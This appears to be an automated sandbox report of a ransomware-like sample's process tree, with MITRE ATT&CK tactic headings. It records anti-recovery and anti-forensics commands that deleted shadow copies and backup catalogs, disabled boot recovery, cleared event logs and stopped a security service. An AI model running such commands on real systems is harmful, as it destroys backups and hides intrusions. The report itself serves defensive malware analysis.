  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4504
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5096
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB"
1⤵
PID:2788
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=F: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3404

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB"
1⤵
PID:2824
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Z: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3420

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB"
1⤵
PID:2520
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=G: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3340

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB"
1⤵
PID:1284
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Y: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3308

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB"
1⤵
PID:2600
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=X: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3300

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB"
1⤵
PID:2184
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=W: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3212

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB"
1⤵
PID:2148
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=U: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3132

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB"
1⤵
PID:1384
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=T: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3260

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB"
1⤵
PID:2456
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=V: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3268

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB"
1⤵
PID:1100
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=D: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3276

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB"
1⤵
PID:2648
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=S: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3252

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB"
1⤵
PID:2628
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3292

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB"
1⤵
PID:2580
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=B: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB"
1⤵
PID:2584
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=R: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3228

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl system"
1⤵
PID:2720
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl system
  2⤵
  - Clears Windows event logs
  PID:3772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB"
1⤵
PID:2904
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=A: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3148

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB"
1⤵
PID:2696
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=Q: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3080

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
1⤵
PID:2900
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB"
1⤵
PID:2336
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=O: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1772

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP"
1⤵
PID:1176

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB"
1⤵
PID:3016
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=M: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3236

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB"
1⤵
PID:2556
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=N: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3244

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
1⤵
PID:2920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl securit"
1⤵
PID:2908
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl securit
  2⤵
  - Clears Windows event logs
  PID:3180

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"
1⤵
PID:2716

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB"
1⤵
PID:2708
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=L: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3124

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB"
1⤵
PID:2848
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=K: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3316

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "bcdedit /set {default} recoveryenabled No"
1⤵
PID:2888

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wbadmin delete catalog -quiet"
1⤵
PID:2872

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB"
1⤵
PID:2868
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=J: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3284

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "wevtutil cl application"
1⤵
PID:2692
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil cl application
  2⤵
  - Clears Windows event logs
  PID:3792

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB"
1⤵
PID:2712
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=I: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3172

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin delete shadows /all /quiet"
1⤵
PID:2420
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2108

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB"
1⤵
PID:2392
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=H: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2000

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB"
1⤵
PID:2676
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin resize shadowstorage /for=E: /on=C: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1620

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "net stop TmWSCSvc /y"
1⤵
PID:2288
- C:\Windows\SysWOW64\net.exe
  net stop TmWSCSvc /y
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TmWSCSvc /y
    3⤵
    PID:2656

C:\Users\Admin\AppData\Local\Temp\0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe
"C:\Users\Admin\AppData\Local\Temp\0162641163a30a2edff787eeecc733ab1de46f03e213743dc768d39eb3075985.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact